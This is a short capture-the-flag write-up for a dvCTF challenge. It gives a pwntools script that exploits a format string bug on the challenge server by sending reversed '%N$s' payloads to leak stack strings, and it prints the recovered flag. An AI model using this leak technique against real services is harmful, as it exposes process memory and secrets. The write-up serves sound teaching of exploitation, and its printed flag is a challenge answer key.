Tags: pwntools fsb format-string pwn
Rating:
Given a Netcat connection, abuse the FSB (format string bug) in the program to leak the strings on the stack. Note that the payloads need to be reversed (the program asks you to send them like this).
I made this pwntools script to leak the first 100 strings:
```
from pwn import *
context.arch = 'amd64'
context.log_level = 'critical'
host, port = 'challs.dvc.tf', 8888
for i in range(1, 100):
try:
conn = remote(host, port)
payload = f"%{i}$s"[::-1]
print(f"Sending {payload}")
conn.sendlineafter("Reverse string: ", payload)
response = conn.recv().decode().strip()
print(response, "\n")
if "dvCTF{" in response:
print("Flag found!")
break
conn.close()
except KeyboardInterrupt:
break
except:
conn.close()
```
At the 24th string, the flag appeared! (payload: s$42%)
Flag: dvCTF{1_h0p3_n01_s33s_th1s}